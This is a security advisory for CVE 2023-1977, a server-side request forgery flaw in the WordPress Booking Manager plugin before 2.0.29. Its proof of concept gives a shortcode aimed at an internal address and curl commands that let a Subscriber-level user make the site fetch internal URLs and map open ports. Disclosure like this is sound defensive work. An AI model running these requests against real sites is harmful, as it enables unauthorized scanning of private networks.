Booking Manager < 2.0.29 – Subscriber+ SSRF | CVE 2023-1977

Description

The plugin does not validate URLs input in it's admin panel or in shortcodes for showing events from a remote .ics file, allowing an attacker with privileges as low as Subscriber to perform SSRF attacks on the sites internal network.

Proof of Concept

As an admin: 
Type in an internal URL (for example http://127.0.0.1:8080) into the "Upload .ics file and show events" field in the oPluginsPanel admin page.
Click "Show events".
 
As a contributor: 
Create a post with the following shortcode: [booking-manager-listing url='http://127.0.0.1:8080' from='any' until='any']
 
And then preview the post.
 
As a subscriber: 
Use the parse-media-shortcode ajax action built in to WordPress to render the same shortcode as above. Here's an example using curl:
 

% curl -s -c .cookies -F log=subscriber -F pwd=password 'https://example.com/wp-login.php'
% curl -s -b .cookies -d 'action=parse-media-shortcode' --data-urlencode "shortcode=[booking-manager-listing url='http://127.0.0.1:8080' from='any' until='any']" 'https://example.com/wp-admin/admin-ajax.php'|jq .data.body
"<strong>[WPBM Error]</strong> File does not contain events <script src='https://example.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3' id='jquery-core-js'></script>\n<script src='https://example.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0' ...


Using timing or the responses from the various methods above, it's possible to determine if a port is open, and if it responds to http requests.